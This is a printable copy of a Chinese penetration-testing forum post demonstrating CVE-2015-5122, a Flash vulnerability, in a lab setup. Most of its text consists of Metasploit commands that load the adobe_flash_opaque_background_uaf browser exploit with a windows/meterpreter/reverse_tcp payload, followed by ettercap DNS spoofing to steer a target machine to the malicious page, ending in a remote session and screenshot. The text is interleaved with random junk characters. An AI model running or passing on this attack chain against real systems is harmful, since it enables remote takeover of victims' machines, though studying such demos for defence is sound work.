中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

. t; i; |. b2 I5 b: c0 b 二、cve2015-5122漏洞实例演示虚拟机 # v' l! m5 F5 ]2 a$ ?2 m

" o$ V1 F |' h- l# T/ b/ W 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： : y1 C! L7 b( T6 [

4 G- M& `5 P* N" ` search cve-2015-5122如图： % A% ?* c( P6 h5 u! H0 J

- [$ w$ K5 t- i4 J0 a 6 `6 ~2 l% d; t2 N3 P) n

& k5 y; P/ V! H# Y7 E 下面我们敲如下命令： / Q9 @6 @' t- M/ C/ x

[$ \ i$ r' g7 s5 z use exploit/multi/browser/adobe_flash_opaque_background_uaf 2 y) D, Z2 k1 `9 r- P( ~' ~5 [, g

$ z# b& q$ W: A* F0 } set PAYLOAD windows/meterpreter/reverse_tcp $ U" b, V! C- w: {8 a$ N

" w! Q+ E! L$ [1 W# V$ c5 n set LHOST 192.168.0.109 & @1 ?: j, J0 O: `, |6 o; K* e/ F

( E' I" P; R; t: Q. C0 | set URIPATH / /*根目录*/ 9 R$ g" Y. e( B; f1 t

4 j4 r* Z8 J" x$ \ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 r' G- J2 k7 v' G2 C/ m

1 B8 e5 R1 f( V7 c( U2 Q, X set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # {9 p. o, v( ?8 o# [8 p( T

2 I8 y8 i- F& G- ~3 \" o# b 然后show options如图： * t+ n. x+ \5 w; h* T7 {, }: i

( j3 M9 [: I& z w1 e / x- K. D6 h' d" X& ?. r1 I! X3 f

; u7 y$ M. W* i! l1 ~" e0 V 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
8 _, o3 n4 W) R4 \1 c/ R1 c& X 4 e- R7 @7 n- ~3 p) k4 [1 l# L9 `

! w9 }8 G/ H, R9 Y$ |2 x 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 * I9 v( E, m: t8 t. o. H

7 c2 \3 u- s8 r6 ~ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 J" E2 a6 N0 r% _

$ S$ P" [# r! k$ N; W2 K 1 D7 E6 U1 E+ x8 d# I: Y6 ^

* l! b4 f: j, y5 r& d/ j: w 成功了，这时候我们断开ettercap，如图： 0 B8 X& Y# Y; e' c1 M& x

5 F" S3 b j. N1 C9 b : _) d( C/ @, _0 a; q$ u5 _

4 K, B n$ y4 f Screenshot如图： 4 Z# i2 Q; X8 z' S' f

1 i0 g$ b/ \" v/ [1 b' s ; p# X" P* n$ X9 B

. ~' p$ p( h3 c9 w5 d7 ~4 Z 9 x- d* J" W8 F0 Z- [8 O

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)